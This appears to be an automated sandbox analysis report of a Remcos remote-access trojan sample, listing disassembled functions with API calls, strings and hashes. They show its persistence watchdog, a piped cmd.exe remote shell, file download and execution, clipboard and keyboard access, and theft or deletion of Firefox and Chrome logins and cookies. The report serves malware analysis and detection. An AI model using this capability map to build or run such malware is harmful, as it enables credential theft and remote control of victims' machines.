Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB

Function 00424A7D Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00424A87

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A

Non-executed Functions

Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410B6B

Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
CloseHandle.KERNEL32(00000000), ref: 00410BBA
CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F

Strings

svchost.exe, xrefs: 00410D2A
rmclient.exe, xrefs: 00410D4F
Watchdog module activated, xrefs: 00410BE9, 00410E41
Remcos restarted by watchdog!, xrefs: 00410BC5
fsutil.exe, xrefs: 00410D74
WinDir, xrefs: 00410C80, 00410CD5
!G, xrefs: 00410C47
\system32\, xrefs: 00410C6E
\SysWOW64\, xrefs: 00410CC6
Watchdog launch failed!, xrefs: 00410DE8
(#G, xrefs: 00410B98
WDH, xrefs: 00410C1A, 00410C20, 00410E85

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
API String ID: 3018269243-1736093966
Opcode ID: 49c56e30f16afa7b236da27895c5c70f34eeff9bf263767f02d9655acb58ee55
Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
Opcode Fuzzy Hash: 49c56e30f16afa7b236da27895c5c70f34eeff9bf263767f02d9655acb58ee55
Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406D4A
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
DeleteFileW.KERNEL32(00000000), ref: 00406E3A

Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
DeleteFileA.KERNEL32(?), ref: 0040768E

Strings

Downloaded file: , xrefs: 004070BF
Deleted file: , xrefs: 00406E59
Failed to download file: , xrefs: 00407136
Unable to delete: , xrefs: 00406E98
Browsing directory: , xrefs: 004072C9
Downloading file: , xrefs: 0040700E
Executing file: , xrefs: 0040723E
Unable to rename file!, xrefs: 004074A4
open, xrefs: 00407222

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
API String ID: 1385304114-1507758755
Opcode ID: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
Opcode Fuzzy Hash: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B

Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056C6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__Init_thread_footer.LIBCMT ref: 00405703
CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
TerminateProcess.KERNEL32(00000000), ref: 004059F7
CloseHandle.KERNEL32 ref: 00405A03
CloseHandle.KERNEL32 ref: 00405A0B
CloseHandle.KERNEL32 ref: 00405A1D
CloseHandle.KERNEL32 ref: 00405A25

Strings

SystemDrive, xrefs: 00405741
cmd.exe, xrefs: 0040572D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 3fa650e84e535937a813d2229e4f120e717916906164421ace74e9d8f6deae00
Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
Opcode Fuzzy Hash: 3fa650e84e535937a813d2229e4f120e717916906164421ace74e9d8f6deae00
Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E

Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
FindClose.KERNEL32(00000000), ref: 0040AB0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
FindClose.KERNEL32(00000000), ref: 0040AC53

Strings

[Firefox StoredLogins not found], xrefs: 0040AB15
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AA93
\key3.db, xrefs: 0040ABB7
[Firefox StoredLogins Cleared!], xrefs: 0040AC40
UserProfile, xrefs: 0040AAA1
\logins.json, xrefs: 0040AB75

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A

Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
FindClose.KERNEL32(00000000), ref: 0040AD0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
FindClose.KERNEL32(00000000), ref: 0040ADF0
FindClose.KERNEL32(00000000), ref: 0040AE11

Strings

[Firefox cookies found, cleared!], xrefs: 0040AE20
[Firefox Cookies not found], xrefs: 0040AD15, 0040ADDD
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AC93
UserProfile, xrefs: 0040ACA1
\cookies.sqlite, xrefs: 0040AD6D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E

Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414EC2
EmptyClipboard.USER32 ref: 00414ED0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
GlobalLock.KERNEL32(00000000), ref: 00414EF9
GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
Opcode Fuzzy Hash: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A

Function 0041A01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125

Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB

GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C

Strings

pth_unenc, xrefs: 0041A01B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID: pth_unenc
API String ID: 2341273852-4028850238
Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19

Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON

Download Yara Rule

Strings

4, xrefs: 00417770
6, xrefs: 004177CB
2, xrefs: 004176AC
1, xrefs: 0041764D
7, xrefs: 004177E2
5, xrefs: 004177C1
3, xrefs: 0041770C
0, xrefs: 0041760B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6

Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
GetLastError.KERNEL32 ref: 00418771
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
Opcode Fuzzy Hash: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A

Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
FindClose.KERNEL32(00000000), ref: 0040B3BE
FindClose.KERNEL32(00000000), ref: 0040B3E9

Strings

AppData, xrefs: 0040B299
\Mozilla\Firefox\Profiles\, xrefs: 0040B2AF
\cookies.sqlite, xrefs: 0040B34A

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: a62fe0bec1422817c3559ce599887c55a7de2d38d2807c2cce20253f1fdbfdfa
Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
Opcode Fuzzy Hash: a62fe0bec1422817c3559ce599887c55a7de2d38d2807c2cce20253f1fdbfdfa
Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D

Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
GetProcAddress.KERNEL32(00000000), ref: 00412CC1

Strings

Shlwapi.dll, xrefs: 00412CB5
SHDeleteKeyW, xrefs: 00412CB0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 0ba8629cbc95ab7c94c70a1996e8cb2f52f1a2c937a1ac7848cb4dd884e1c605
Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
Opcode Fuzzy Hash: 0ba8629cbc95ab7c94c70a1996e8cb2f52f1a2c937a1ac7848cb4dd884e1c605
Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A

Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00446741
_free.LIBCMT ref: 00446765
_free.LIBCMT ref: 004468EC
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
_free.LIBCMT ref: 00446AB8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
Opcode Fuzzy Hash: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E

Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
GetLastError.KERNEL32 ref: 0040A999

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
[Chrome StoredLogins not found], xrefs: 0040A9B3
UserProfile, xrefs: 0040A95F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF

Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
GetLastError.KERNEL32 ref: 00415CDB

Strings

SeShutdownPrivilege, xrefs: 00415CB0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5

Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408393

Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC

Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C

FindClose.KERNEL32(00000000), ref: 004086F4

Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
Opcode Fuzzy Hash: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98

Function 00410763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E

Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F

Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9

Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
GetKeyboardLayout.USER32(00000000), ref: 004094AE
